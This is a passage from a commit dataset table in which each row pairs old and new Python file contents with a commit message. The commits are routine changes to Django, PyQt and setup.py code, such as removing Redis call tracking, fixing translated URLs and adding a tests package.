commit stringlengths 40 40 | old_file stringlengths 4 118 | new_file stringlengths 4 118 | old_contents stringlengths 0 2.94k | new_contents stringlengths 1 4.43k | subject stringlengths 15 444 | message stringlengths 16 3.45k | lang stringclasses 1 value | license stringclasses 13 values | repos stringlengths 5 43.2k | prompt stringlengths 17 4.58k | response stringlengths 1 4.43k | prompt_tagged stringlengths 58 4.62k | response_tagged stringlengths 1 4.43k | text stringlengths 132 7.29k | text_tagged stringlengths 173 7.33k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
36d98f499316d4695c20544701dd1d4300aca600 | corehq/ex-submodules/dimagi/utils/couch/cache/cache_core/lib.py | corehq/ex-submodules/dimagi/utils/couch/cache/cache_core/lib.py | from __future__ import absolute_import
from __future__ import unicode_literals
import simplejson
from django_redis.cache import RedisCache
from . import CACHE_DOCS, key_doc_id, rcache
from corehq.util.soft_assert import soft_assert
def invalidate_doc_generation(doc):
from .gen import GenerationCache
doc_type = doc.get('doc_type', None)
generation_mgr = GenerationCache.doc_type_generation_map()
if doc_type in generation_mgr:
generation_mgr[doc_type].invalidate_all()
def _get_cached_doc_only(doc_id):
"""
helper cache retrieval method for open_doc - for use by views in retrieving their docs.
"""
doc = rcache().get(key_doc_id(doc_id), None)
if doc and CACHE_DOCS:
return simplejson.loads(doc)
else:
return None
class HQRedisCache(RedisCache):
def _track_call(self):
hq_assert = soft_assert(['sreddy+redis' + '@' + 'dimagi.com'])
hq_assert(False, msg="Detected Redis multikey operation")
def set_many(self, *args, **kwargs):
self._track_call()
super(HQRedisCache, self).set_many(*args, **kwargs)
def get_many(self, *args, **kwargs):
self._track_call()
return super(HQRedisCache, self).get_many(*args, **kwargs)
def delete_many(self, *args, **kwargs):
self._track_call()
return super(HQRedisCache, self).delete_many(*args, **kwargs)
| from __future__ import absolute_import
from __future__ import unicode_literals
import simplejson
from . import CACHE_DOCS, key_doc_id, rcache
def invalidate_doc_generation(doc):
from .gen import GenerationCache
doc_type = doc.get('doc_type', None)
generation_mgr = GenerationCache.doc_type_generation_map()
if doc_type in generation_mgr:
generation_mgr[doc_type].invalidate_all()
def _get_cached_doc_only(doc_id):
"""
helper cache retrieval method for open_doc - for use by views in retrieving their docs.
"""
doc = rcache().get(key_doc_id(doc_id), None)
if doc and CACHE_DOCS:
return simplejson.loads(doc)
else:
return None
| Revert "track multi key ops in Redis" | Revert "track multi key ops in Redis"
| Python | bsd-3-clause | dimagi/commcare-hq,dimagi/commcare-hq,dimagi/commcare-hq,dimagi/commcare-hq,dimagi/commcare-hq | from __future__ import absolute_import
from __future__ import unicode_literals
import simplejson
from django_redis.cache import RedisCache
from . import CACHE_DOCS, key_doc_id, rcache
from corehq.util.soft_assert import soft_assert
def invalidate_doc_generation(doc):
from .gen import GenerationCache
doc_type = doc.get('doc_type', None)
generation_mgr = GenerationCache.doc_type_generation_map()
if doc_type in generation_mgr:
generation_mgr[doc_type].invalidate_all()
def _get_cached_doc_only(doc_id):
"""
helper cache retrieval method for open_doc - for use by views in retrieving their docs.
"""
doc = rcache().get(key_doc_id(doc_id), None)
if doc and CACHE_DOCS:
return simplejson.loads(doc)
else:
return None
class HQRedisCache(RedisCache):
def _track_call(self):
hq_assert = soft_assert(['sreddy+redis' + '@' + 'dimagi.com'])
hq_assert(False, msg="Detected Redis multikey operation")
def set_many(self, *args, **kwargs):
self._track_call()
super(HQRedisCache, self).set_many(*args, **kwargs)
def get_many(self, *args, **kwargs):
self._track_call()
return super(HQRedisCache, self).get_many(*args, **kwargs)
def delete_many(self, *args, **kwargs):
self._track_call()
return super(HQRedisCache, self).delete_many(*args, **kwargs)
Revert "track multi key ops in Redis" | from __future__ import absolute_import
from __future__ import unicode_literals
import simplejson
from . import CACHE_DOCS, key_doc_id, rcache
def invalidate_doc_generation(doc):
from .gen import GenerationCache
doc_type = doc.get('doc_type', None)
generation_mgr = GenerationCache.doc_type_generation_map()
if doc_type in generation_mgr:
generation_mgr[doc_type].invalidate_all()
def _get_cached_doc_only(doc_id):
"""
helper cache retrieval method for open_doc - for use by views in retrieving their docs.
"""
doc = rcache().get(key_doc_id(doc_id), None)
if doc and CACHE_DOCS:
return simplejson.loads(doc)
else:
return None
| <commit_before>from __future__ import absolute_import
from __future__ import unicode_literals
import simplejson
from django_redis.cache import RedisCache
from . import CACHE_DOCS, key_doc_id, rcache
from corehq.util.soft_assert import soft_assert
def invalidate_doc_generation(doc):
from .gen import GenerationCache
doc_type = doc.get('doc_type', None)
generation_mgr = GenerationCache.doc_type_generation_map()
if doc_type in generation_mgr:
generation_mgr[doc_type].invalidate_all()
def _get_cached_doc_only(doc_id):
"""
helper cache retrieval method for open_doc - for use by views in retrieving their docs.
"""
doc = rcache().get(key_doc_id(doc_id), None)
if doc and CACHE_DOCS:
return simplejson.loads(doc)
else:
return None
class HQRedisCache(RedisCache):
def _track_call(self):
hq_assert = soft_assert(['sreddy+redis' + '@' + 'dimagi.com'])
hq_assert(False, msg="Detected Redis multikey operation")
def set_many(self, *args, **kwargs):
self._track_call()
super(HQRedisCache, self).set_many(*args, **kwargs)
def get_many(self, *args, **kwargs):
self._track_call()
return super(HQRedisCache, self).get_many(*args, **kwargs)
def delete_many(self, *args, **kwargs):
self._track_call()
return super(HQRedisCache, self).delete_many(*args, **kwargs)
<commit_msg>Revert "track multi key ops in Redis"<commit_after> | from __future__ import absolute_import
from __future__ import unicode_literals
import simplejson
from . import CACHE_DOCS, key_doc_id, rcache
def invalidate_doc_generation(doc):
from .gen import GenerationCache
doc_type = doc.get('doc_type', None)
generation_mgr = GenerationCache.doc_type_generation_map()
if doc_type in generation_mgr:
generation_mgr[doc_type].invalidate_all()
def _get_cached_doc_only(doc_id):
"""
helper cache retrieval method for open_doc - for use by views in retrieving their docs.
"""
doc = rcache().get(key_doc_id(doc_id), None)
if doc and CACHE_DOCS:
return simplejson.loads(doc)
else:
return None
| from __future__ import absolute_import
from __future__ import unicode_literals
import simplejson
from django_redis.cache import RedisCache
from . import CACHE_DOCS, key_doc_id, rcache
from corehq.util.soft_assert import soft_assert
def invalidate_doc_generation(doc):
from .gen import GenerationCache
doc_type = doc.get('doc_type', None)
generation_mgr = GenerationCache.doc_type_generation_map()
if doc_type in generation_mgr:
generation_mgr[doc_type].invalidate_all()
def _get_cached_doc_only(doc_id):
"""
helper cache retrieval method for open_doc - for use by views in retrieving their docs.
"""
doc = rcache().get(key_doc_id(doc_id), None)
if doc and CACHE_DOCS:
return simplejson.loads(doc)
else:
return None
class HQRedisCache(RedisCache):
def _track_call(self):
hq_assert = soft_assert(['sreddy+redis' + '@' + 'dimagi.com'])
hq_assert(False, msg="Detected Redis multikey operation")
def set_many(self, *args, **kwargs):
self._track_call()
super(HQRedisCache, self).set_many(*args, **kwargs)
def get_many(self, *args, **kwargs):
self._track_call()
return super(HQRedisCache, self).get_many(*args, **kwargs)
def delete_many(self, *args, **kwargs):
self._track_call()
return super(HQRedisCache, self).delete_many(*args, **kwargs)
Revert "track multi key ops in Redis"from __future__ import absolute_import
from __future__ import unicode_literals
import simplejson
from . import CACHE_DOCS, key_doc_id, rcache
def invalidate_doc_generation(doc):
from .gen import GenerationCache
doc_type = doc.get('doc_type', None)
generation_mgr = GenerationCache.doc_type_generation_map()
if doc_type in generation_mgr:
generation_mgr[doc_type].invalidate_all()
def _get_cached_doc_only(doc_id):
"""
helper cache retrieval method for open_doc - for use by views in retrieving their docs.
"""
doc = rcache().get(key_doc_id(doc_id), None)
if doc and CACHE_DOCS:
return simplejson.loads(doc)
else:
return None
| <commit_before>from __future__ import absolute_import
from __future__ import unicode_literals
import simplejson
from django_redis.cache import RedisCache
from . import CACHE_DOCS, key_doc_id, rcache
from corehq.util.soft_assert import soft_assert
def invalidate_doc_generation(doc):
from .gen import GenerationCache
doc_type = doc.get('doc_type', None)
generation_mgr = GenerationCache.doc_type_generation_map()
if doc_type in generation_mgr:
generation_mgr[doc_type].invalidate_all()
def _get_cached_doc_only(doc_id):
"""
helper cache retrieval method for open_doc - for use by views in retrieving their docs.
"""
doc = rcache().get(key_doc_id(doc_id), None)
if doc and CACHE_DOCS:
return simplejson.loads(doc)
else:
return None
class HQRedisCache(RedisCache):
def _track_call(self):
hq_assert = soft_assert(['sreddy+redis' + '@' + 'dimagi.com'])
hq_assert(False, msg="Detected Redis multikey operation")
def set_many(self, *args, **kwargs):
self._track_call()
super(HQRedisCache, self).set_many(*args, **kwargs)
def get_many(self, *args, **kwargs):
self._track_call()
return super(HQRedisCache, self).get_many(*args, **kwargs)
def delete_many(self, *args, **kwargs):
self._track_call()
return super(HQRedisCache, self).delete_many(*args, **kwargs)
<commit_msg>Revert "track multi key ops in Redis"<commit_after>from __future__ import absolute_import
from __future__ import unicode_literals
import simplejson
from . import CACHE_DOCS, key_doc_id, rcache
def invalidate_doc_generation(doc):
from .gen import GenerationCache
doc_type = doc.get('doc_type', None)
generation_mgr = GenerationCache.doc_type_generation_map()
if doc_type in generation_mgr:
generation_mgr[doc_type].invalidate_all()
def _get_cached_doc_only(doc_id):
"""
helper cache retrieval method for open_doc - for use by views in retrieving their docs.
"""
doc = rcache().get(key_doc_id(doc_id), None)
if doc and CACHE_DOCS:
return simplejson.loads(doc)
else:
return None
|
786de8ec482ed67b78696357c66dfa9292eea62f | tk/templatetags.py | tk/templatetags.py | from django.core.urlresolvers import reverse, resolve
from django.template import Library
from django.utils import translation
from django.templatetags.i18n import register
@register.simple_tag(takes_context=True)
def translate_url(context, language):
view = resolve(context['request'].path)
args = [a for a in view.args if a is not None]
kwargs = {k:v for k,v in view.kwargs.items() if v is not None}
with translation.override(language):
url = reverse(view.view_name, args=args, kwargs=kwargs)
return url
| from django.core.urlresolvers import reverse, resolve
from django.template import Library
from django.utils import translation
from django.templatetags.i18n import register
@register.simple_tag(takes_context=True)
def translate_url(context, language):
if hasattr(context.get('object', None), 'get_absolute_url'):
with translation.override(language):
return context['object'].get_absolute_url()
view = resolve(context['request'].path)
args = [a for a in view.args if a is not None]
kwargs = {k:v for k,v in view.kwargs.items() if v is not None}
with translation.override(language):
return reverse(view.view_name, args=args, kwargs=kwargs)
| Fix getting the translated urls for material detail views | Fix getting the translated urls for material detail views
| Python | agpl-3.0 | GISAElkartea/tresna-kutxa,GISAElkartea/tresna-kutxa,GISAElkartea/tresna-kutxa,GISAElkartea/tresna-kutxa | from django.core.urlresolvers import reverse, resolve
from django.template import Library
from django.utils import translation
from django.templatetags.i18n import register
@register.simple_tag(takes_context=True)
def translate_url(context, language):
view = resolve(context['request'].path)
args = [a for a in view.args if a is not None]
kwargs = {k:v for k,v in view.kwargs.items() if v is not None}
with translation.override(language):
url = reverse(view.view_name, args=args, kwargs=kwargs)
return url
Fix getting the translated urls for material detail views | from django.core.urlresolvers import reverse, resolve
from django.template import Library
from django.utils import translation
from django.templatetags.i18n import register
@register.simple_tag(takes_context=True)
def translate_url(context, language):
if hasattr(context.get('object', None), 'get_absolute_url'):
with translation.override(language):
return context['object'].get_absolute_url()
view = resolve(context['request'].path)
args = [a for a in view.args if a is not None]
kwargs = {k:v for k,v in view.kwargs.items() if v is not None}
with translation.override(language):
return reverse(view.view_name, args=args, kwargs=kwargs)
| <commit_before>from django.core.urlresolvers import reverse, resolve
from django.template import Library
from django.utils import translation
from django.templatetags.i18n import register
@register.simple_tag(takes_context=True)
def translate_url(context, language):
view = resolve(context['request'].path)
args = [a for a in view.args if a is not None]
kwargs = {k:v for k,v in view.kwargs.items() if v is not None}
with translation.override(language):
url = reverse(view.view_name, args=args, kwargs=kwargs)
return url
<commit_msg>Fix getting the translated urls for material detail views<commit_after> | from django.core.urlresolvers import reverse, resolve
from django.template import Library
from django.utils import translation
from django.templatetags.i18n import register
@register.simple_tag(takes_context=True)
def translate_url(context, language):
if hasattr(context.get('object', None), 'get_absolute_url'):
with translation.override(language):
return context['object'].get_absolute_url()
view = resolve(context['request'].path)
args = [a for a in view.args if a is not None]
kwargs = {k:v for k,v in view.kwargs.items() if v is not None}
with translation.override(language):
return reverse(view.view_name, args=args, kwargs=kwargs)
| from django.core.urlresolvers import reverse, resolve
from django.template import Library
from django.utils import translation
from django.templatetags.i18n import register
@register.simple_tag(takes_context=True)
def translate_url(context, language):
view = resolve(context['request'].path)
args = [a for a in view.args if a is not None]
kwargs = {k:v for k,v in view.kwargs.items() if v is not None}
with translation.override(language):
url = reverse(view.view_name, args=args, kwargs=kwargs)
return url
Fix getting the translated urls for material detail viewsfrom django.core.urlresolvers import reverse, resolve
from django.template import Library
from django.utils import translation
from django.templatetags.i18n import register
@register.simple_tag(takes_context=True)
def translate_url(context, language):
if hasattr(context.get('object', None), 'get_absolute_url'):
with translation.override(language):
return context['object'].get_absolute_url()
view = resolve(context['request'].path)
args = [a for a in view.args if a is not None]
kwargs = {k:v for k,v in view.kwargs.items() if v is not None}
with translation.override(language):
return reverse(view.view_name, args=args, kwargs=kwargs)
| <commit_before>from django.core.urlresolvers import reverse, resolve
from django.template import Library
from django.utils import translation
from django.templatetags.i18n import register
@register.simple_tag(takes_context=True)
def translate_url(context, language):
view = resolve(context['request'].path)
args = [a for a in view.args if a is not None]
kwargs = {k:v for k,v in view.kwargs.items() if v is not None}
with translation.override(language):
url = reverse(view.view_name, args=args, kwargs=kwargs)
return url
<commit_msg>Fix getting the translated urls for material detail views<commit_after>from django.core.urlresolvers import reverse, resolve
from django.template import Library
from django.utils import translation
from django.templatetags.i18n import register
@register.simple_tag(takes_context=True)
def translate_url(context, language):
if hasattr(context.get('object', None), 'get_absolute_url'):
with translation.override(language):
return context['object'].get_absolute_url()
view = resolve(context['request'].path)
args = [a for a in view.args if a is not None]
kwargs = {k:v for k,v in view.kwargs.items() if v is not None}
with translation.override(language):
return reverse(view.view_name, args=args, kwargs=kwargs)
|
a66ba9970675cbc0a79ec683d8db6046865d022e | OnionLauncher/main.py | OnionLauncher/main.py | import sys
from PyQt5.QtWidgets import QApplication, QMainWindow
from PyQt5.uic import loadUi
class MainWindow(QMainWindow):
def __init__(self, *args):
super(MainWindow, self).__init__(*args)
loadUi("ui_files/main.ui", self)
self.tbAdd.clicked.connect(self.addRow)
self.tbRemove.clicked.connect(self.removeRow)
def addRow(self):
rowPos = self.twSettings.rowCount()
self.twSettings.insertRow(rowPos)
def removeRow(self):
rows = sorted(set(index.row() for index in self.twSettings.selectedIndexes()))
rows.reverse()
for row in rows:
self.twSettings.removeRow(int(row))
if __name__ == "__main__":
app = QApplication(sys.argv)
mw = MainWindow()
mw.show()
sys.exit(app.exec_())
| import sys
from PyQt5.QtWidgets import QApplication, QMainWindow
from PyQt5.uic import loadUi
class MainWindow(QMainWindow):
def __init__(self, *args):
super(MainWindow, self).__init__(*args)
loadUi("ui_files/main.ui", self)
self.tbAdd.clicked.connect(self.addRow)
self.tbRemove.clicked.connect(self.removeRow)
def addRow(self):
rowPos = self.twSettings.rowCount()
self.twSettings.insertRow(rowPos)
def removeRow(self):
rows = sorted(set(index.row() for index in self.twSettings.selectedIndexes()))
rows.reverse()
for row in rows:
self.twSettings.removeRow(row)
if __name__ == "__main__":
app = QApplication(sys.argv)
mw = MainWindow()
mw.show()
sys.exit(app.exec_())
| Remove useless conversion in remove row code | Remove useless conversion in remove row code
| Python | bsd-2-clause | neelchauhan/OnionLauncher | import sys
from PyQt5.QtWidgets import QApplication, QMainWindow
from PyQt5.uic import loadUi
class MainWindow(QMainWindow):
def __init__(self, *args):
super(MainWindow, self).__init__(*args)
loadUi("ui_files/main.ui", self)
self.tbAdd.clicked.connect(self.addRow)
self.tbRemove.clicked.connect(self.removeRow)
def addRow(self):
rowPos = self.twSettings.rowCount()
self.twSettings.insertRow(rowPos)
def removeRow(self):
rows = sorted(set(index.row() for index in self.twSettings.selectedIndexes()))
rows.reverse()
for row in rows:
self.twSettings.removeRow(int(row))
if __name__ == "__main__":
app = QApplication(sys.argv)
mw = MainWindow()
mw.show()
sys.exit(app.exec_())
Remove useless conversion in remove row code | import sys
from PyQt5.QtWidgets import QApplication, QMainWindow
from PyQt5.uic import loadUi
class MainWindow(QMainWindow):
def __init__(self, *args):
super(MainWindow, self).__init__(*args)
loadUi("ui_files/main.ui", self)
self.tbAdd.clicked.connect(self.addRow)
self.tbRemove.clicked.connect(self.removeRow)
def addRow(self):
rowPos = self.twSettings.rowCount()
self.twSettings.insertRow(rowPos)
def removeRow(self):
rows = sorted(set(index.row() for index in self.twSettings.selectedIndexes()))
rows.reverse()
for row in rows:
self.twSettings.removeRow(row)
if __name__ == "__main__":
app = QApplication(sys.argv)
mw = MainWindow()
mw.show()
sys.exit(app.exec_())
| <commit_before>import sys
from PyQt5.QtWidgets import QApplication, QMainWindow
from PyQt5.uic import loadUi
class MainWindow(QMainWindow):
def __init__(self, *args):
super(MainWindow, self).__init__(*args)
loadUi("ui_files/main.ui", self)
self.tbAdd.clicked.connect(self.addRow)
self.tbRemove.clicked.connect(self.removeRow)
def addRow(self):
rowPos = self.twSettings.rowCount()
self.twSettings.insertRow(rowPos)
def removeRow(self):
rows = sorted(set(index.row() for index in self.twSettings.selectedIndexes()))
rows.reverse()
for row in rows:
self.twSettings.removeRow(int(row))
if __name__ == "__main__":
app = QApplication(sys.argv)
mw = MainWindow()
mw.show()
sys.exit(app.exec_())
<commit_msg>Remove useless conversion in remove row code<commit_after> | import sys
from PyQt5.QtWidgets import QApplication, QMainWindow
from PyQt5.uic import loadUi
class MainWindow(QMainWindow):
def __init__(self, *args):
super(MainWindow, self).__init__(*args)
loadUi("ui_files/main.ui", self)
self.tbAdd.clicked.connect(self.addRow)
self.tbRemove.clicked.connect(self.removeRow)
def addRow(self):
rowPos = self.twSettings.rowCount()
self.twSettings.insertRow(rowPos)
def removeRow(self):
rows = sorted(set(index.row() for index in self.twSettings.selectedIndexes()))
rows.reverse()
for row in rows:
self.twSettings.removeRow(row)
if __name__ == "__main__":
app = QApplication(sys.argv)
mw = MainWindow()
mw.show()
sys.exit(app.exec_())
| import sys
from PyQt5.QtWidgets import QApplication, QMainWindow
from PyQt5.uic import loadUi
class MainWindow(QMainWindow):
def __init__(self, *args):
super(MainWindow, self).__init__(*args)
loadUi("ui_files/main.ui", self)
self.tbAdd.clicked.connect(self.addRow)
self.tbRemove.clicked.connect(self.removeRow)
def addRow(self):
rowPos = self.twSettings.rowCount()
self.twSettings.insertRow(rowPos)
def removeRow(self):
rows = sorted(set(index.row() for index in self.twSettings.selectedIndexes()))
rows.reverse()
for row in rows:
self.twSettings.removeRow(int(row))
if __name__ == "__main__":
app = QApplication(sys.argv)
mw = MainWindow()
mw.show()
sys.exit(app.exec_())
Remove useless conversion in remove row codeimport sys
from PyQt5.QtWidgets import QApplication, QMainWindow
from PyQt5.uic import loadUi
class MainWindow(QMainWindow):
def __init__(self, *args):
super(MainWindow, self).__init__(*args)
loadUi("ui_files/main.ui", self)
self.tbAdd.clicked.connect(self.addRow)
self.tbRemove.clicked.connect(self.removeRow)
def addRow(self):
rowPos = self.twSettings.rowCount()
self.twSettings.insertRow(rowPos)
def removeRow(self):
rows = sorted(set(index.row() for index in self.twSettings.selectedIndexes()))
rows.reverse()
for row in rows:
self.twSettings.removeRow(row)
if __name__ == "__main__":
app = QApplication(sys.argv)
mw = MainWindow()
mw.show()
sys.exit(app.exec_())
| <commit_before>import sys
from PyQt5.QtWidgets import QApplication, QMainWindow
from PyQt5.uic import loadUi
class MainWindow(QMainWindow):
def __init__(self, *args):
super(MainWindow, self).__init__(*args)
loadUi("ui_files/main.ui", self)
self.tbAdd.clicked.connect(self.addRow)
self.tbRemove.clicked.connect(self.removeRow)
def addRow(self):
rowPos = self.twSettings.rowCount()
self.twSettings.insertRow(rowPos)
def removeRow(self):
rows = sorted(set(index.row() for index in self.twSettings.selectedIndexes()))
rows.reverse()
for row in rows:
self.twSettings.removeRow(int(row))
if __name__ == "__main__":
app = QApplication(sys.argv)
mw = MainWindow()
mw.show()
sys.exit(app.exec_())
<commit_msg>Remove useless conversion in remove row code<commit_after>import sys
from PyQt5.QtWidgets import QApplication, QMainWindow
from PyQt5.uic import loadUi
class MainWindow(QMainWindow):
def __init__(self, *args):
super(MainWindow, self).__init__(*args)
loadUi("ui_files/main.ui", self)
self.tbAdd.clicked.connect(self.addRow)
self.tbRemove.clicked.connect(self.removeRow)
def addRow(self):
rowPos = self.twSettings.rowCount()
self.twSettings.insertRow(rowPos)
def removeRow(self):
rows = sorted(set(index.row() for index in self.twSettings.selectedIndexes()))
rows.reverse()
for row in rows:
self.twSettings.removeRow(row)
if __name__ == "__main__":
app = QApplication(sys.argv)
mw = MainWindow()
mw.show()
sys.exit(app.exec_())
|
affc6d644a5a259b1237df419b32b7001431ea6f | setup.py | setup.py | #!/usr/bin/env python
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
with open('README.rst') as file_readme:
readme = file_readme.read()
setup(name='json-sempai',
version='0.3.0',
description='Use JSON files as if they\'re python modules',
long_description=readme,
author='Louis Taylor',
author_email='kragniz@gmail.com',
license='MIT',
url='https://github.com/kragniz/json-sempai',
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
],
keywords='please don\'t use this library for anything',
packages=['jsonsempai'],
test_suite='jsonsempai.tests'
)
| #!/usr/bin/env python
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
with open('README.rst') as file_readme:
readme = file_readme.read()
setup(name='json-sempai',
version='0.3.0',
description='Use JSON files as if they\'re python modules',
long_description=readme,
author='Louis Taylor',
author_email='kragniz@gmail.com',
license='MIT',
url='https://github.com/kragniz/json-sempai',
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
],
keywords='please don\'t use this library for anything',
packages=['jsonsempai', 'jsonsempai.tests'],
test_suite='jsonsempai.tests'
)
| Add jsonsempai.tests to list of packages to install | Add jsonsempai.tests to list of packages to install
Closes: #10
| Python | mit | kragniz/json-sempai | #!/usr/bin/env python
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
with open('README.rst') as file_readme:
readme = file_readme.read()
setup(name='json-sempai',
version='0.3.0',
description='Use JSON files as if they\'re python modules',
long_description=readme,
author='Louis Taylor',
author_email='kragniz@gmail.com',
license='MIT',
url='https://github.com/kragniz/json-sempai',
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
],
keywords='please don\'t use this library for anything',
packages=['jsonsempai'],
test_suite='jsonsempai.tests'
)
Add jsonsempai.tests to list of packages to install
Closes: #10 | #!/usr/bin/env python
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
with open('README.rst') as file_readme:
readme = file_readme.read()
setup(name='json-sempai',
version='0.3.0',
description='Use JSON files as if they\'re python modules',
long_description=readme,
author='Louis Taylor',
author_email='kragniz@gmail.com',
license='MIT',
url='https://github.com/kragniz/json-sempai',
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
],
keywords='please don\'t use this library for anything',
packages=['jsonsempai', 'jsonsempai.tests'],
test_suite='jsonsempai.tests'
)
| <commit_before>#!/usr/bin/env python
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
with open('README.rst') as file_readme:
readme = file_readme.read()
setup(name='json-sempai',
version='0.3.0',
description='Use JSON files as if they\'re python modules',
long_description=readme,
author='Louis Taylor',
author_email='kragniz@gmail.com',
license='MIT',
url='https://github.com/kragniz/json-sempai',
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
],
keywords='please don\'t use this library for anything',
packages=['jsonsempai'],
test_suite='jsonsempai.tests'
)
<commit_msg>Add jsonsempai.tests to list of packages to install
Closes: #10<commit_after> | #!/usr/bin/env python
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
with open('README.rst') as file_readme:
readme = file_readme.read()
setup(name='json-sempai',
version='0.3.0',
description='Use JSON files as if they\'re python modules',
long_description=readme,
author='Louis Taylor',
author_email='kragniz@gmail.com',
license='MIT',
url='https://github.com/kragniz/json-sempai',
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
],
keywords='please don\'t use this library for anything',
packages=['jsonsempai', 'jsonsempai.tests'],
test_suite='jsonsempai.tests'
)
| #!/usr/bin/env python
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
with open('README.rst') as file_readme:
readme = file_readme.read()
setup(name='json-sempai',
version='0.3.0',
description='Use JSON files as if they\'re python modules',
long_description=readme,
author='Louis Taylor',
author_email='kragniz@gmail.com',
license='MIT',
url='https://github.com/kragniz/json-sempai',
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
],
keywords='please don\'t use this library for anything',
packages=['jsonsempai'],
test_suite='jsonsempai.tests'
)
Add jsonsempai.tests to list of packages to install
Closes: #10#!/usr/bin/env python
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
with open('README.rst') as file_readme:
readme = file_readme.read()
setup(name='json-sempai',
version='0.3.0',
description='Use JSON files as if they\'re python modules',
long_description=readme,
author='Louis Taylor',
author_email='kragniz@gmail.com',
license='MIT',
url='https://github.com/kragniz/json-sempai',
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
],
keywords='please don\'t use this library for anything',
packages=['jsonsempai', 'jsonsempai.tests'],
test_suite='jsonsempai.tests'
)
| <commit_before>#!/usr/bin/env python
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
with open('README.rst') as file_readme:
readme = file_readme.read()
setup(name='json-sempai',
version='0.3.0',
description='Use JSON files as if they\'re python modules',
long_description=readme,
author='Louis Taylor',
author_email='kragniz@gmail.com',
license='MIT',
url='https://github.com/kragniz/json-sempai',
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
],
keywords='please don\'t use this library for anything',
packages=['jsonsempai'],
test_suite='jsonsempai.tests'
)
<commit_msg>Add jsonsempai.tests to list of packages to install
Closes: #10<commit_after>#!/usr/bin/env python
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
with open('README.rst') as file_readme:
readme = file_readme.read()
setup(name='json-sempai',
version='0.3.0',
description='Use JSON files as if they\'re python modules',
long_description=readme,
author='Louis Taylor',
author_email='kragniz@gmail.com',
license='MIT',
url='https://github.com/kragniz/json-sempai',
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
],
keywords='please don\'t use this library for anything',
packages=['jsonsempai', 'jsonsempai.tests'],
test_suite='jsonsempai.tests'
)
|
91165642fb40165987ab0ff734959f88712e514c | humblemedia/resources/migrations/0001_initial.py | humblemedia/resources/migrations/0001_initial.py | # encoding: utf8
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Resource',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),
('title', models.CharField(max_length=64)),
('description', models.TextField()),
('author', models.ForeignKey(to=settings.AUTH_USER_MODEL, to_field='id')),
('file', models.FileField(upload_to='resources/')),
('min_price', models.PositiveIntegerField(default=1, blank=True)),
('is_published', models.BooleanField(default=False)),
('is_verified', models.BooleanField(default=True)),
],
options={
},
bases=(models.Model,),
),
]
| # encoding: utf8
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('auth', '__first__'),
('contenttypes', '__first__'),
]
operations = [
migrations.CreateModel(
name='Resource',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),
('title', models.CharField(max_length=64)),
('description', models.TextField()),
('author', models.ForeignKey(to=settings.AUTH_USER_MODEL, to_field='id')),
('file', models.FileField(upload_to='resources/')),
